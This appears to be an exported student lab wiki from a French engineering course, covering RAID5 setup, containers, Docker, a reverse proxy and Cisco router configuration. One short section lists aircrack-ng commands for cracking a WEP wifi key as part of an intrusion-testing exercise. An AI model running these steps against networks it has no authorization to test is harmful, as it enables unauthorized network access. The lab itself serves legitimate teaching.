=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Suite à une erreur de manipulation le /var est mort&lt;br /&gt;
&lt;br /&gt;
Pour réaliser la suite du TP j'ai recrée une VM Dionysos2, même addresse IP.&lt;br /&gt;
&lt;br /&gt;
Il faut donc éteindre la VM Dionysos pour éviter tout problème&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
==== Le routage de sites (IPv4) ====&lt;br /&gt;
&lt;br /&gt;
==== Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49062</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49062"/>
				<updated>2018-12-21T09:51:07Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* Introduction */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
  xl create Dionysos.cfg&lt;br /&gt;
  xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
Dans /root/.profile&lt;br /&gt;
  &lt;br /&gt;
  http_proxy=&amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;&lt;br /&gt;
  https_proxy=&amp;quot;https://proxy.polytech-lille.fr:3128&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
  xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
